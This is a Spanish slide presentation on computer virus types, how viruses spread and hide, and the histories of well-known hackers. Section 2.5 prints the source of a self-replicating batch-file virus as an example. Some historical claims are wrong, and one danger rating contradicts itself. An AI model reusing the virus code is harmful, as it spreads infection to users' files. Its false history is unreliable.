Los Virus

  • May 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Los Virus as PDF for free.

More details

  • Words: 10,510
  • Pages: 114
VS

INDICE:  

  

1-Introduccion 2-Los virus informaticos 3-Hackers 4-Seguridad 5-Otras amenazas

1-INTRODUCCION:  



Los virus son una de las muchas amenazas que pueden sufrir hoy nuestros ordenadores. En 1939 John Von Neuman escribió un articulo en donde exponía su teoría de la existencia de autómatas complejos donde demostraba la posibilidad de desarrollar pequeños programas que pudieran tomar el control de otros de similar estructura y llegaría a ser cierta su teoría pero pasaría algo de tiempo hasta llegar a la extensión que tienen actualmente sus llamados autómatas el primer paso lo darían tres jóvenes programadores (en 1949) en los laboratorios de AT&T bell estos tres jóvenes (Robert Thomas Morris, Douglas MC Llory, Victor Vysottsky) a manera de entretenimiento crearon un juego llamado CORE WAR O GUERRA NUCLEAR dicho juego consistía en una batalla entre los códigos de dos programadores en la que cada jugador desarrollaba un programa cuya misión era acaparar la máxima memoria posible mediante la reproducción de si mismo. Este juego fue motivo de varios concursos en importantes centros de investigación como el de la XEROX en California y el MASSACHUSSET TECHNOLOGY INSTITUTE (MAT), entre otros.

CONTINUACION: En 1988 ROBERT TAPPAN MORRIS HIJO de ROBERT THOMAS MORRIS introdujo un virus en arpanet precursora de internet los daños que causo en la red se estimaron en 100 millones de dólares lo que provoco que en la actualidad este procesado (arpanet fue una creación del ministerio de defensa americano cuya funcion era la de ser una red de comunicación interna y que luego se extendió a los hogares hasta llegar a su actual denominación como internet).Tras estos y otros acontecimientos sobre apariciones de virus se ha investigado y se sigue investigando a pesar de que cada dia aparecen nuevos virus cada vez mas dañinos la existencia de los antivirus hará posible la desaparición de algunos de estos virus pero no podemos olvidar el papel fundamental de los hackers que en su mayoría crean estos virus con fines malignos todo comenzó con el hijo de robert Thomas morris pero con la evolución de las tecnologías estos han evolucionado todo esto y mas lo desarrollaremos en los siguientes puntos del trabajo

2-LOS VIRUS INFORMATICOS

2.1-VIRUS: DEFINICION: 

Un virus es un pequeño segmento de código ejecutable escrito en ensamblador o lenguaje de macro, capaz de tomar el control de la maquina o aplicación en algún momento y auto replicarse, alojándose en un soporte diferente al que se encontraba originalmente.

2.2¿COMO SE DETECTA UN VIRUS? 

Cambio de longitud en archivos.



Modificación de la fecha original de los archivos.



Aparición de archivos o directorios extraños.



Dificultad para arrancar el PC o no conseguir inicializarlo.



El PC se "re-bootea" frecuentemente Bloqueo del teclado.



El PC no reconoce el disco duro. Ralentización en la velocidad de ejecución de los programas.



Archivos que se ejecutan mal.



El PC no reconoce las disqueteras. Se borran archivos inexplicablemente. Aparecen nuevas macros en documentos de Word.



La opción "ver macros" se desactiva.



Pide passwords no configurados por el usuario. O, por supuesto, con un software anti-virus ADECUADO y

2.2-COMO CLASIFICAR LOS VIRUS:

        

Dependiendo del lugar donde se alojan, la técnica de replicación o la plataforma en la cual trabajan, podemos diferenciar en distintos tipos de virus.   Existen ocho categorías de virus: Parásitos. Del sector de arranque inicial. Multipartitos. Acompañantes. De vínculo. De fichero de datos. Virus de macro. Virus e-mail.

-CONTINUACION: 

Además de estos tipos también existen otros programas informáticos nocivos similares a los virus, pero que no cumplen ambos requisitos de reproducirse y eludir su detección. Estos programas se dividen en tres categorías:



Caballos de Troya.



Bombas lógicas.



Gusanos.



Y por ultimo estan los denominados parásitos que son dos:



De acción directa



residentes

2.3-TIPOS DE VIRUS: 

RESIDENTES

 

       

DE ACCION DIRECTA DE SOBREESCRITURA DE BOOT DE MACRO DE ENLACE O DIRECTORIO ENCRIPTADOS POLIFORMICOS MULTIPARTITES

      

DE FAT TROYANOS GUSANOS BOMBAS LOGICAS VIRUS FALSOS DIALER DE FICHERO DE COMPAÑÍA BAT

2.3.1-DEFINICION DE LOS TIPOS DE VIRUS:  





Virus residentes o parásitos: La característica principal de estos virus es que se ocultan en la memoria RAM de forma permanente o residente. De este modo, pueden controlar e interceptar todas las operaciones llevadas a cabo por el sistema operativo, infectando todos aquellos ficheros y/o programas que sean ejecutados, abiertos, cerrados, renombrados, copiados, etc. Estos virus sólo atacan cuando se cumplen ciertas condiciones definidas previamente por su creador (por ejemplo, una fecha y hora determinada). Mientras tanto, permanecen ocultos en una zona de la memoria principal, ocupando un espacio de la misma, hasta que son detectados y eliminados. Algunos ejemplos de este tipo de virus son: Randex, CMJ, Meve, MrKlunky.

2.3.2-DE ACCION DIRECTA O PARASITOS: 





Al contrario que los residentes, estos virus no permanecen en memoria. Por tanto, su objetivo prioritario es reproducirse y actuar en el mismo momento de ser ejecutados. Al cumplirse una determinada condición, se activan y buscan los ficheros ubicados dentro de su mismo directorio para contagiarlos. Además, también realizan sus acciones en los directorios especificados dentro de la línea PATH (camino o ruta de directorios), dentro del fichero AUTO EXEC.BAT (fichero que siempre se encuentra en el directorio raíz del disco duro). Los virus de acción directa presentan la ventaja de que los ficheros afectados por ellos pueden ser desinfectados y restaurados completamente.

2.3.3-DE SOBREESCRITURA: 



 

Estos virus se caracterizan por destruir la información contenida en los ficheros que infectan. Cuando infectan un fichero, escriben dentro de su contenido, haciendo que queden total o parcialmente inservibles. También se diferencian porque los ficheros infectados no aumentan de tamaño, a no ser que el virus ocupe más espacio que el propio fichero (esto se debe a que se colocan encima del fichero infectado, en vez de ocultarse dentro del mismo). La única forma de limpiar un fichero infectado por un virus de sobre escritura es borrarlo, perdiéndose su contenido. Algunos ejemplos de este tipo de virus son: Way, Trj.Reboot, Trivial.88.D.

2.3.4-BOOT O DE ARRANQUE: 







Los términos boot o sector de arranque hacen referencia a una sección muy importante de un disco (tanto un disquete como un disco duro respectivamente). En ella se guarda la información esencial sobre las características del disco y se encuentra un programa que permite arrancar el ordenador. Este tipo de virus no infecta ficheros, sino los discos que los contienen. Actúan infectando en primer lugar el sector de arranque de los disquetes. Cuando un ordenador se pone en marcha con un disquete infectado, el virus de boot infectará a su vez el disco duro. Los virus de boot no pueden afectar al ordenador mientras no se intente poner en marcha a éste último con un disco infectado. Por tanto, el mejor modo de defenderse contra ellos es proteger los disquetes contra escritura y no arrancar nunca el ordenador con un disquete desconocido en la disquetera. Algunos ejemplos de este tipo de virus son: Polyboot.B, AntiEXE.

2.3.5-DE MACRO: 









El objetivo de estos virus es la infección de los ficheros creados usando determinadas aplicaciones que contengan macros: documentos de Word (ficheros con extensión DOC), hojas de cálculo de Excel (ficheros con extensión XLS), bases de datos de Access (ficheros con extensión MDB), presentaciones de PowerPoint (ficheros con extensión PPS), ficheros de Corel Draw, etc. Las macros son micro-programas asociados a un fichero, que sirven para automatizar complejos conjuntos de operaciones. Al ser programas, las macros pueden ser infectadas. Cuando se abre un fichero que contenga un virus de este tipo, las macros se cargarán de forma automática, produciéndose la infección. La mayoría de las aplicaciones que utilizan macros cuentan con una protección antivirus y de seguridad específica, pero muchos virus de macro sortean fácilmente dicha protección. Existe un tipo diferente de virus de macro según la herramienta usada: de Word, de Excel, de Access, de PowerPoint, multiprograma o de archivos RTF. Sin embargo, no todos los programas o herramientas con macros pueden ser afectadas por estos virus. Estos son algunos ejemplos: Relax, Melissa.A, Bablas, O97M/Y2K.

2.3.6-DE ENLACE O DIRECTORIO: 





Los ficheros se ubican en determinadas direcciones (compuestas básicamente por unidad de disco y directorio), que el sistema operativo conoce para poder localizarlos y trabajar con ellos. Los virus de enlace o directorio alteran las direcciones que indican donde se almacenan los ficheros. De este modo, al intentar ejecutar un programa (fichero con extensión EXE o COM) infectado por un virus de enlace, lo que se hace en realidad es ejecutar el virus, ya que éste habrá modificado la dirección donde se encontraba originalmente el programa, colocándose en su lugar. Una vez producida la infección, resulta imposible localizar y trabajar con los ficheros originales.

2.3.7-ENCRIPTADOS: 





Más que un tipo de virus, se trata de una técnica utilizada por algunos de ellos, que a su vez pueden pertenecer a otras clasificaciones. Estos virus se cifran o encriptan a sí mismos para no ser detectados por los programas antivirus. Para realizar sus actividades, el virus se descifra a sí mismo y, cuando ha finalizado, se vuelve a cifrar. Estos son algunos ejemplos de este tipo de virus: Elvira, Trile.

2.3.8-POLIFORMICOS:







Son virus que en cada infección que realizan se cifran o encriptan de una forma distinta (utilizando diferentes algoritmos y claves de cifrado). De esta forma, generan una elevada cantidad de copias de sí mismos e impiden que los antivirus los localicen a través de la búsqueda de cadenas o firmas, por lo que suelen ser los virus más costosos de detectar. Algunos ejemplos de este tipo de virus son: Elkern, Marburg, Satan Bug, Tuareg.

3.2.9-MULTIPARTITES: 





Virus muy avanzados, que pueden realizar múltiples infecciones, combinando diferentes técnicas para ello. Su objetivo es cualquier elemento que pueda ser infectado: archivos, programas, macros, discos, etc. Se consideran muy peligrosos por su capacidad de combinar muchas técnicas de infección y por los dañinos efectos de sus acciones.

.

Algunos ejemplos de estos virus son: Ywinz

3.2.10-DE FICHERO: 



Infectan programas o ficheros ejecutables (ficheros con extensiones EXE y COM). Al ejecutarse el programa infectado, el virus se activa, produciendo diferentes efectos. La mayoría de los virus existentes son de este tipo.

3.2.11-DE COMPAÑÍA: 





Son virus de fichero que al mismo tiempo pueden ser residentes o de acción directa. Su nombre deriva de que "acompañan" a otros ficheros existentes en el sistema antes de su llegada, sin modificarlos como hacen los virus de sobreescritura o los residentes. Para efectuar las infecciones, los virus de compañía pueden esperar ocultos en la memoria hasta que se lleve a cabo la ejecución de algún programa, o actuar directamente haciendo copias de sí mismos. Algunos ejemplos de este tipo de virus son: Stator, Asimov.1539, Terrax.1069.

3.2.12-DE FAT: 



La Tabla de Asignación de Ficheros o FAT es la sección de un disco utilizada para enlazar la información contenida en éste. Se trata de un elemento fundamental en el sistema. Los virus que atacan a este elemento son especialmente peligrosos, ya que impedirán el acceso a ciertas partes del disco, donde se almacenan los ficheros críticos para el normal funcionamiento del ordenador. Los daños causados a la FAT se traducirán en pérdidas de la información contenida en ficheros individuales y en directorios completos.

3.2.13-WORMS (GUSANOS): 

De un modo estricto, los gusanos no se consideran virus porque no necesitan infectar otros ficheros para reproducirse. A efectos prácticos, son tratados como virus y son detectados y eliminados por los antivirus.



Básicamente, los gusanos se limitan a realizar copias de sí mismos a la máxima velocidad posible, sin tocar ni dañar ningún otro fichero. Sin embargo, se reproducen a tal velocidad que pueden colapsar por saturación las redes en las que se infiltran.



Las infecciones producidas por estos virus casi siempre se realizan a través del correo electrónico, las redes informáticas y los canales de chat (tipo IRC o ICQ) de Internet. También pueden propagarse dentro de la memoria del ordenador.

3.2.14-TROYANOS O CABALLOS DE TROYA: 









Técnicamente, los Troyanos tampoco se consideran virus, ya que no se reproducen infectando otros ficheros. Tampoco se propagan haciendo copias de sí mismo como hacen los gusanos. A efectos prácticos, son tratados como virus y son detectados y eliminados por los antivirus. El objetivo básico de estos virus es la introducción e instalación de otros programas en el ordenador, para permitir su control remoto desde otros equipos. Su nombre deriva del parecido en su forma de actuar de los astutos griegos de la mitología: llegan al ordenador como un programa aparentemente inofensivo. Sin embargo, al ejecutarlo instalará en nuestro ordenador un segundo programa, el troyano. Los efectos de los Troyanos pueden ser muy peligrosos. Al igual que los virus, tienen la capacidad de eliminar ficheros o destruir la información del disco duro. Pero además pueden capturar y reenviar datos confidenciales a una dirección externa o abrir puertos de comunicaciones, permitiendo que un posible intruso controle nuestro ordenador de forma remota. Estos son algunos ejemplos de Troyanos: IRC.Sx2, Trifor.

-TIPOS DE TROYANOS 

1-BACKDOORS



7-TROYANOS PROXIES



2-TROYANOS EN GENERAL



8-TROYANOS ESPIAS



9-TROYANOS NOTIFIERS



3-TROYANOS PSW



4-TROYANOS CLIKERS



10-ROOTKITS



5-TROYANOS DOWNLOADERS



11-ARC BOMBS



6-TROYANOS DROPPERS

3.2.15-DIALERS: 

Los Dialers son programas que se instalan en el ordenador y que, llaman a números de tarifación adicional sin que el usuario lo sepa. Se suelen instalar mediante un fichero ejecutable (.exe) o mediante la descarga de un control ActiveX.

3.2.15-BOMBAS LOGICAS: 



Tampoco se consideran estrictamente virus, ya que no se reproducen. Ni siquiera son programas independientes, sino un segmento camuflado dentro de otro programa. Tienen por objetivo destruir los datos de un ordenador o causar otros daños de consideración en él cuando se cumplen ciertas condiciones. Mientras este hecho no ocurre, nadie se percata de la presencia de la bomba lógica. Su acción puede llegar a ser tremendamente destructiva.

3.2.16-FALSOS: 







Al margen de las divisiones anteriores, existen ciertos tipos de mensajes o programas que en ciertos casos son confundidos con virus, pero que no son virus en ningún sentido. El principal componente de este grupo son los hoaxes o bulos. Los hoaxes no son virus, sino mensajes de correo electrónico engañosos, que se difunden masivamente por Internet sembrando la alarma sobre supuestas infecciones víricas y amenazas contra los usuarios. Los hoaxes tratan de ganarse la confianza de los usuarios aportando datos que parecen ciertos y proponiendo una serie de acciones a realizar para librarse de la supuesta infección. Si se recibe un hoax, no hay que hacer caso de sus advertencias e instrucciones: lo más aconsejable es borrarlo sin prestarle la más mínima atención y no reenviarlo a otras personas.

2.4-¿COMO ACTUA UN VIRUS INFORMATICO?: 

El ciclo de los virus informático es muy similar al de los biológicos (de ahí su nombre).



1-Infección: Al ejecutar un archivo infectado (el código del virus se ha implantado en el archivo anteriormente) comienza la fase de infección, duplicándose e implantándose en otros archivos ejecutables. Comienza la "invasión" del sistema informático. La víctima, aún no es consciente de la existencia del virus ya que este permanece oculto y sin causar daños apreciables.



2-Expansión: El virus pasará a otros ordenadores, a través de redes informáticas, disquetes y CDs que contengan archivos infectados, software en Internet, archivos adjuntos a mensaje electrónicos, etc.



3-Explosión: Si el virus no ha sido detectado y destruido por algún programa antivirus, en un momento determinado o bajo determinadas circunstancias, tomará el control del ordenador infectado, ejecutando la acción para la que fue programado. En este momento, debido a los trágicos efectos que pueden llegar a ocasionar, se hará evidente su existencia, acabando con información vital contenida en el sistema informático.

                   

2.5-¿COMO ES EL CODIGO FUENTE DE UN VIRUS?:EJEMPLO ¨@echo GOOFY ¨ off%[GooFy]% if '%1==' 42! goto GooFy%2 if exist \GooFy_.Bat goto GooFyRun if not exist %0.bat goto GooFyOut find "GooFy"<%0.bat>\GooFy_.Bat :GooFyRun Root Bat in a shell command /c \GooFy_.Bat 42! Vir goto GooFyOut and run the host :GooFyVir Looks for BATs in current and parent for %%a in (*.bat ..\*.bat) do call %0 42! GooFy %%a exit GooFy without doing anything :GooFyGooFy Only works with DOS 6 find "GooFy"<%3>nul.amIhere? if not errorlevel 1 goto GooFyOut type \GooFy_.bat>GooFy$ type %3>>GooFy$ move GooFy$ %3>nul exit GooFy after infecting one batch :GooFyOut *** the GooFy Batch Vir *** ::--- and here's your host...

2.6-TECNICAS DE PROGRAMACION DE UN VIRUS: Los programadores de virus usan distintas técnicas para procurar que su virus difícil de detectar por los usuario y los propios antivirus estas técnicas son las siguientes: 

Técnicas Stealth: Son técnicas "furtivas" que utilizan para pasar desapercibidos al usuario y a los antivirus. Habitualmente los virus ocultan el tamaño real de los ficheros que han contaminado, de forma que si hacemos un DIR la información del tamaño de los archivos puede ser falsa. Los virus de tabla de partición guardan una copia de la FAT original en otro lugar del disco que marcan como sectores defectuosos para mostrársela al usuario cuando haga por ejemplo un FDISK. Incluso hay virus que detectan la ejecución de determinados antivirus y  descargan de la memoria partes de su propio código "sospechoso" para cargarse de nuevo cuando estos han finalizado su búsqueda.

-TUNNELING: 

Es una técnica usada por programadores de virus y antivirus para evitar todas las rutinas al servicio de una interrupción y tener así un control directo sobre esta.



Requiere una programación compleja, hay que colocar el procesador en modo paso a paso. En este modo de funcionamiento, tras ejecutarse cada instrucción se produce la interrupción 1. Se coloca una ISR (Interrupt Service Routine) para dicha interrupción y se ejecutan instrucciones comprobando cada vez si se ha llegado a donde se quería hasta  recorrer toda la cadena de ISRs que halla colocando el parche al final de la cadena.

-ANTIDEBUGGER: 

Un debugger es un programa que permite Recompilar programas ejecutables y mostrar parte de su código en lenguaje original. Los virus usan técnicas para evitar ser desensamblados y así impedir su análisis para la fabricación del antivirus correspondiente. 

2.7-LOS DAÑOS QUE CAUSAN LOS VIRUS: 

Los virus causas daños a distintos elementos del ordenador dichos elementos son el software y el hardware:



En software:

 

  





Modificar programas y datos (virus Black Box: agrega un número de bytes a los programas infectados.) Eliminar programas y datos (Melissa: Macrovirus de Word). Se envía a sí mismo por correo. Daña todos los archivos DOC; virus JERUSALEM: borra, los viernes 13, todos los programas que el usuario trate de utilizar después de haberse infectado la memoria residente. Agotar el espacio libre del disco rígido. Demorar el trabajo del sistema. Sustraer información confidencial (Mighty: gusano para Linux:, Troj/Backdoor.Netdex.A: trojano, W32/Daboom): gusano de Internet, caballo de Troya tipo RAT. Producir mensajes o efectos extraños en pantalla (WinWord.Concept): Macrovirus que infecta la plantilla Normal.dot. Hace aparecer mensajes en la pantalla y el WORD funciona incorrectamente. Emitir música o ruidos (virus FORM): el día 18 de cada mes cualquier tecla que se presione hace sonar el beep.

-EN HARDWARE: 

Borrar el BIOS (Chernobyl (W95.CIH): Intenta reescribir el BIOS de la PC lo que obliga a cambiar la motherboard.



Formatear el disco rígido (FormatC): Troyano que infecta el Word, al abrir un archivo infectado formatea el disco rígido.



Borrar la FAT (tabla de partición de archivos), Chernobyl (W95.CIH): Borra el primer Mb del diso duro, donde se encuentra la FAT. Obliga a formatear el disco duro. Además intenta reescribir el BIOS de la PC lo que obliga a cambiar la motherboard. Se activa el 26 de abril. Michelangelo: Virus del sector de arranque. Se activa el 6 de marzo.



Sobreescribe la FAT, deja el disco inutilizable.



Alterar el MBR (Master Boot Record), Troj/Killboot.B. Trojano que borra el MBR llenándolo de ceros.

2.8-GRADOS DE DAÑO DE LOS VIRUS: 

Sin daños: En este caso el virus no realiza ninguna acción tras la infección generalmente suelen ser virus que solo se dedican a propagarse e infectar otros ordenadores o elementos



Daño mínima: Solamente realizan acciones que son molestas para el usuario sin afectar a la integridad de la información ni otras áreas del equipo (suelen presentar mensajes, animaciones etc)



Daño moderado/escaso: En este caso pueden presentarse modificaciones de archivos o perdidas moderadas de información pero nunca serán totalmente destructivas .Las posibles acciones del virus serian reparables

-CONTINUACION: 

Daño grave: Perdida de grandes cantidades de información y/o archivos aun asi parte de los datos podrían ser recuperados aunque el proceso seria complicado



Daño muy grave irreparable: En este caso podría perder toda la información contenidas en las unidades de disco infectadas. Se podrían además perder la estructura de cada una de las unidades de disco ( por lo menos de la principal) mediante el formateo de estas los daños causados son difíciles de recuperar y en ocasiones irreparables pero tambien pueden afectar a otros sistemas como la BIOS, la RAM etc



Daños imprevisibles: Son aquellos que generalmente causan los troyanos Estos son programas que pueden estar siendo manejados de forma remota desde otro ordenador este tipo de programas cada vez son mas complejos y cuentas con mas utilidades y funciones de ataque

2.9-GRADOS DE PROPAGACION DE UN VIRUS: 





La propagación de un virus se determina mediante el ratio de infección, que mide el porcentaje de ordenadores infectados en relación al total de equipos explorados. Los valores que puede adoptar el grado de propagación de un virus son los siguientes: Epidemia: el porcentaje de ordenadores examinados e infectados con el virus es del 10% o superior.

  

Propagación alta: el porcentaje de ordenadores examinados e infectados con el virus es superior al 7,5% e inferior al 10%.  



Propagación media: el porcentaje de ordenadores examinados e infectados con el virus es superior al 1,0% e inferior al 7,5%.  



Propagación baja: el porcentaje de ordenadores examinados e infectados con el virus es inferior al 1,0%.  

2.10-GRADOS DE PELIGROSIDAD DE UN VIRUS: 

Peligrosidad baja: amenaza pequeña, ya que el virus es muy dañino, está poco extendido.  



Peligrosidad media: el virus está relativamente extendido y su infección causa perjuicios ó bien está poco extendido pero su infección puede causar daños importantes. 



Peligrosidad alta: amenaza importante, ya que el virus está muy extendido y su infección causa daños ó bien está relativamente extendido y además su infección causa grandes perjuicios. 



Peligrosidad muy alta: amenaza muy importante, ya que está muy extendido y su infección causa grandes perjuicios.



Lógicamente, la peligrosidad de un virus puede variar, siendo de peligrosidad baja en un momento y de muy alta peligrosidad en otro, dependiendo de lo extendido

2.11-ESTRUCTURA DE UN VIRUS: En la estructura básica de un virus informatico podemos distinguir tres modulos: 

Modulo de reproducción



Modulo de ataque



Modulo de defensa

-MODULO DE REPRODUCCION: Es el encargado de manejar las rutinas de parasitacion con el fin de que el virus informatico reproduzca. De esta manera puede tomar el control del sistema e infectar otras entidades que posibiliten que el virus se traslade de un ordenador a otro a través de alguna de ellas

-MODULO DE ATAQUE: Este modulo es optativo – un virus puede tenerlo o no- es el que maneja las rutinas de daño adicional del virus las que son activadas cuando el sistema cumple algun tipo de condicion

-MODULO DE DEFENSA: Este modulo tambien es optativo tiene la obvia misión de defender al virus informatico sus rutinas apuntan a evitar acciones que faciliten o provoquen la detección del virus cada vez son mas sofisticadas las técnicas de defensa de los virus informaticos

3-HISTORIA DE LOS HACKERS:

3.1-DEFINICION: 





Hacker, originalmente, término utilizado para referirse a un aficionado a los ordenadores o computadoras, totalmente cautivado por la programación y la tecnología informática. En la década de 1980, con la llegada de las computadoras personales, y posteriormente con la posibilidad de conexión a los grandes sistemas de ordenadores a través de Internet, este término adquirió una connotación peyorativa y comenzó a usarse para denominar a quien se conecta a una red para invadir en secreto computadoras, y consultar, alterar o eliminar los programas o los datos almacenados en las mismas, aunque a eso es a lo que dedican su atención los denominados crackers. También se utiliza para referirse a alguien que, además de programar, disfruta desensamblando sistemas operativos y programas para entender su lógica de funcionamiento, para lo que utiliza programas que desensamblan el código y realizan operaciones de ingeniería inversa.

3.2-¿COMO ES UN HACKER?: 

Un hacer se considera miembro de una elite de elegidos. Para pertenecer a ella debe demostrar que se lo merece. Por lo general los hackers no tienen problemas en aceptar nuevos miembros en su elite, pero un hacKer se puede considerar tal solamente cuando otros lo llaman hackers. Otra característica de los hackers, que los hace peligrosos para si mismos, es su tendencia a fanfarronear con sus logros.

3.3-COMO DIFERENCIAR ENTRE HACKER Y CRACKER: 



El hacker: Es alguien que se apasiona por las computadoras y se dedica a ellas más allá de los límites. Los hackers tienen "un saludable sentido de curiosidad: prueban todas las cerraduras de las puertas para averiguar si están cerradas. No sueltan un sistema que están investigando hasta que los problemas que se le presenten queden resueltos". El cracker: Es aquella persona que haciendo gala de grandes conocimientos sobre computación y con un obcecado propósito de luchar en contra de lo que le está prohibido, empieza a investigar la forma de bloquear protecciones hasta lograr su objetivo. Los crackers modernos usan programas propios o muchos de los que se distribuyen gratuitamente en cientos de páginas web en Internet, tales como rutinas

-JHON DRAPER: CAPITAN CRUNCH Nuestra historia comienza a principios de los años 70, de la  



mano de un joven de 27 años llamado John Drapea. Por aquel entonces la empresa Quaker Oaks comercializaba (y aún comercializa) en los EEUU unos cereales llamados “Cap’n Crunch”, cuya mascota era un simpático capitán de barco. Como muchas otras marcas, solían incluir en las cajas un regalo promocional para incrementar las ventas. Fue gracias a un amigo ciego como John Draper se enteró de que, taponando con pegamento uno de los agujeros del silbato, éste producía un tono puro con una frecuencia de 2600 Hz, que era casualmente la frecuencia usada en las conexiones telefónicas de larga distancia para indicar que la llamada había terminado. De esta forma, al emitir el tono de 2600 Hz, la compañía telefónica dejaba de tarificar la llamada, aunque la llamada continuaba hasta que una de las partes colgara el auricular. Una vez emitido el tono de 2600 Hz, uno de los extremos de la línea se desconectaba y el lado conectado entrar en modo de operador, listo para “escuchar” los tonos especiales que determinaban la llamada. Esto, literalmente, abría los circuitos de la compañía a cualquiera que supiera como utilizarlos. El hack era posible debido a la política de recorte de precios de las líneas ATT de larga distancia, en las que la voz y la señal usaban el mismo canal.

CONTINUACION 





Experimentando con el silbato, Draper, al que se le empezaba a conocer ya con el apódo de “Cap’n Crunch”, construyó la famosa “caja azul”, un dispositivo electrónico capaz de reproducir el resto de tonos usados por la compañía telefónica, mediante los cuales el terminal reconocía, por ejemplo, que número se estaba marcando, ya que cada tecla tenía un tono diferente. Todavía hoy en día podéis comprobar esto en vuestra propia casa, en cualquier teléfono de teclas. Pulsadlas y observaréis como cada número del teclado produce un sonido diferente al presionarlo. De esta forma, gracias a los sonidos reproducidos por la “caja azul” John Draper consiguió uno de los primeros hackeos de la historia: realizar llamadas teléfonicas gratuitas a larga distancia. Primero emitía el tono de 2600 Hz para entrar en modo de operador y, a continuación, emitía los tonos correspondientes a las cifras del número que quería marcar. El invento dió la vuelta al mundo. Gracias a él, miles de usuarios estuvieron realizando llamadas telefónicas de larga distancia y conectándose gratuitamente a BBS de todo el planeta.

CONTINUACION 



El mismísimo Steve Wozniak, cofundador de Apple junto a Steve Jobs, había conocido a Draper en la Universidad de Berkeley en el invierno de 1971. Draper le explicó los fundamentos de la “caja azul”, gracias a lo cual se sacó unos cuantos dólares en la Universidad construyendo y vendiendo estos aparatos. Este dinero permitió a Woz y Steve financiar el prototipo del primer ordenador Apple: el Apple I. El propio Draper fue durante un tiempo empleado de Apple, creando un módem para el Apple II, que nunca llegó a comercializarse, entre otras razones porque Draper fue arrestado nuevamente en 1977. En la cárcel, Draper programó EasyWriter, que fue el primer procesador de texto del ordenador Apple II. Esta serie de acontecimientos me plantea una pregunta, cuando menos, interesante, que muestra como lo que parecen una serie de coincidencias fortuitas influyen decisivamente en el devenir de la historia: ¿Existiría el iMac si a la empresa Quaker Oaks no se le hubiera ocurrido regalar un silbato en sus cereales?

CONTINUACION 



Cuando la compañía telefónica se dió cuenta de esta vulnerabilidad de los teléfonos antiguos, intentó corregirla usando circuitos separados para la voz y las señales, de modo que, aunque se introdujeran los tonos correctos por el auricular; al ir estos por un canal separado no pudieran interferir en el sistema de conexión de llamadas. Posteriormente, la sustitución de la tecnología analógica por la digital eliminó de raíz la posibilidad de interferir en el sistema de conexión. Sin embargo, el famoso silbato de Cap’n Crunch sigue teniendo un gran valor como objeto de coleccionista. La historia del Cap’n Crunch dió origen, además, al nombre a la revista de hackers más famosa de la historia: “The 2600 Magazine”, que todavía sigue en activo.

-FRED COHEN: En 1984 al sustentar su tesis para un doctorado en Ingeniería Eléctrica, en la Universidad del Sur de California, demostró cómo se podían crear virus, motivo por el cual es considerado como el primer autor de virus "auto-declarado". Clasificó a los emergentes virus de computadoras en tres categorías: caballos de troya, gusanos y virus

-KENETH THOMPSON: Desarrolló el Lenguaje B, predecesor e inspirador del Lenguaje C. Asimismo, Thompson re-escribió el Kernel de UNIX para perfeccionarlo. Junto a Dennis Ritchie desarrollaron desde 1969 a 1971 el famoso sistema operativo UNIX. En 1984, emulando al Dr. Fred Cohen y siendo aún un estudiante, Keneth Thompson demostró la forma de desarrollar virus de computadoras, frente a una concurrida audiencia en la universidad de Berkeley.

-ROBERT TAPPAN MORRIS: 

Robert Tappan Morris hijo de Robert Thomas Morris uno de los precursores de los virus y recién graduado en Computer Science en la Universidad de Cornell, en 1988 difundió un virus a través de ArpaNet, (precursora de Internet) logrando infectar 6,000 servidores conectados a la red. La propagación la realizó desde uno de los terminales del MIT (Instituto Tecnológico de Massachussets). ArpaNet empleaba el UNIX, como sistema operativo. Robert Tappan Morris al ser descubierto, fue enjuiciado y condenado en la corte de Syracuse, estado de Nueva York, a 4 años de prisión y el pago de US $ 10,000 de multa, pena que fue conmutada a libertad bajo palabra y condenado a cumplir 400 horas de trabajo comunitario.

-KEVIN DAVID MITNICK: 

Kevin David Mitnick es el más famoso hackers de los últimos tiempos. Nacido el 6 de Agosto de 1963 en Van Nuts, California, desde muy niño sintió curiosidad por los sistemas de comunicación electrónica y fue cultivando un obsesivo deseo por investigar cosas y lograr objetivos aparentemente imposibles, hasta llegar a poseer una genial habilidad para ingresar a servidores sin autorización, robar información, interceptar teléfonos, crear virus, etc.

-CONTINUACION: 

Cuando en 1992 el gobierno acusó a Kevin de haber substraído información del FBI, relacionada a la investigación de Ferdinand Marcos y de haber penetrado en computadoras militares, el se convirtió en un símbolo entre la comunidad internacional de hackers, después de que el FBI lo investigara y persiguiera infructuosamente durante tres años, y cuya captura se produjo en 1995, cuando los investigadores rastrearon sus huellas hasta llegar a un departamento en Raleigh, en Carolina del Norte.

-CONTINUACION: 

Mitnick fue arrestado por el FBI en Raleigh, North Carolina, el 15 de Febrero de 1995. Mitnick, quién fue liberado en Enero del 2000, después de permanecer casi 5 años en un prisión federal, le costó al estado norteamericano y a empresas privadas, millones de dólares al ser objeto de hurto de su software, información y alteración de los datos de las mismas. Entre los agraviados se incluyen corporaciones tales como Motorola, Novell, Nokia y Sun Microsystems, el FBI, el Pentágono y la Universidad de Southern California.

-MARK ABENE: Más conocido como Phiber Optik, con tan solo 17 años se convirtió en un genio de la computación y de la tecnología telefónica. Las primeras computadoras usadas por Abene fueron una Apple II, la Timex Sinclair y una Commodore 64. Aunque el primer equipo de Mark fue una Radio Shack TSR 80, también tenía un receptor telefónico tantas veces usado, que tenía una cinta plástica enrrollada para sostener sus partes internas, desgastadas por el excesivo uso. Mark Abene era un experto en patrones de discado en receptores telefónicos. Lideró en New York, al grupo de hackers denominado "Master of Deception", MOD (Maestros de la Decepción).

-CONTINUACION: 

En Noviembre de 1989, hizo colapsar las computadoras de WNET, uno de los principales canales de televisión de la ciudad de New York, dejando un mensaje "Happy Thanks giving you turkeys, from all of us at MOD" (Feliz Día de Acción de Gracias a Uds. pavos, de parte de todos nosotros en MOD). Una revista de New York lo catalogó, como "una de las 100 personas más inteligentes de la nación". En Julio de 1992, Abene y cuatro miembros de MOD fueron arrestados por una serie de cargos criminales. Abene se declaró culpable de los cargos federales de acceso desautorizado a computadoras de la compañia de teléfonos, incursión a computadoras y conspiración. Mark Abene pasó 10 meses en la prisión del condado Schuylkill de Pennsylvania, donde recibió tantas visitas y concedió entrevistas a periodistas y reporteros de canales de televisión, que sus compañeros de celda los apodaron CNN.

-CONTINUACION: 

